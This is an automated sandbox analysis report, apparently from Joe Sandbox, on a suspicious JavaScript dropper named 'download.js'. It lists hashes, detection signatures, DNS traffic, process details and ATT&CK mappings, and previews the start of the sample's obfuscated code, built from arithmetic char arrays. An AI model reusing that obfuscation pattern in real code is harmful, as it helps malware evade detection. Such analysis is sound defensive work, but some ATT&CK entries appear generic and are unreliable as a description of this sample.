
Windows Analysis Report
download.js

Overview

General Information

Sample name: download.js
Analysis ID: 1559080
MD5: 9357b0c94d4cbc79742037437f91bcc3
SHA1: 2dea51b874477fa5e1b2dca1c3a9f0e63b0980d2
SHA256: 1d4d2387cc84d022c01913e5b8c89592114b0235259a8830a6b4f2ecac1dac4d
Tags: js, KongTuke, user-monitorsg

Detection

Score: 21
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 7308 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 7308, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 7308, ProcessName: wscript.exe
No Suricata rule has matched

Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: time.windows.com
Source: download.js | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: sus21.winJS@1/0@1/0
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (one line per tactic, techniques in matrix order; a number in parentheses is the report's hit count for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials
Resource Development: Scripting (2); Domains
Initial Access: Valid Accounts; Default Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job
Persistence: Scripting (2); DLL Side-Loading (1)
Privilege Escalation: DLL Side-Loading (1); Boot or Logon Initialization Scripts
Defense Evasion: DLL Side-Loading (1); Obfuscated Files or Information (1)
Credential Access: OS Credential Dumping; LSASS Memory
Discovery: System Information Discovery (2); Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (1)
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Impact: Abuse Accessibility Features; Network Denial of Service
Source | Detection | Scanner | Label | Link
download.js | 5% | ReversingLabs | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
time.windows.com | unknown | unknown | false | | high
No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559080
Start date and time: 2024-11-20 06:58:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.js
Detection: SUS
Classification: sus21.winJS@1/0@1/0
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .js
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.101.57.9, 20.12.23.50
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
No simulations
No context
No created / dropped files found
File type: ASCII text, with very long lines (12351), with CRLF line terminators
Entropy (8bit): 6.050021771009888
TrID:
File name: download.js
File size: 21'059 bytes
MD5: 9357b0c94d4cbc79742037437f91bcc3
SHA1: 2dea51b874477fa5e1b2dca1c3a9f0e63b0980d2
SHA256: 1d4d2387cc84d022c01913e5b8c89592114b0235259a8830a6b4f2ecac1dac4d
SHA512: b9929209a4fa61db03c0541833d0bf374a7c8b3b41d29ed2a99e16e12e629a5cf1a4485c39034776b636c3de79e223a244660d828de025e5f5f157f81562b1bf
SSDEEP: 384:8f+ziLEnu1IG9SKPOf2x5P7Q93OyUjJPkCLfgNTWQh:85IGeOx5PcuJ7U5h
TLSH: B0928D83B789F4F942DD956E9E53780C76252C3FC18A9DC4F6E2EA8373816401F84E86
File Content Preview: $frwmhd=$executioncontext;$retionoredatisonreaterarinatrees = ([cHAr[]]@((-4108+4161),(-2458+2510),(158175/2775),(10292-(13498-3256)),(565152/(9022+(6106490/(55888651/(19648-(2018+7837)))))),(9958-9904),(6467-6411),(-5483+(25945530/4685)),(385440/(611+639
Icon Hash: 68d69b8bb6aa9a86
UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 06:59:19.353250980 CET | 61686 | 53 | 192.168.2.7 | 1.1.1.1

DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 06:59:19.353250980 CET | 192.168.2.7 | 1.1.1.1 | 0x82c8 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false

DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 06:59:19.360542059 CET | 1.1.1.1 | 192.168.2.7 | 0x82c8 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 06:59:21.234457016 CET | 1.1.1.1 | 192.168.2.7 | 0xbdf4 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 20, 2024 06:59:21.234457016 CET | 1.1.1.1 | 192.168.2.7 | 0xbdf4 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 06:59:41.560693026 CET | 1.1.1.1 | 192.168.2.7 | 0x68cf | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 06:59:41.560693026 CET | 1.1.1.1 | 192.168.2.7 | 0x68cf | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false


Target ID: 0
Start time: 00:59:23
Start date: 20/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js"
Imagebase: 0x7ff762270000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

No disassembly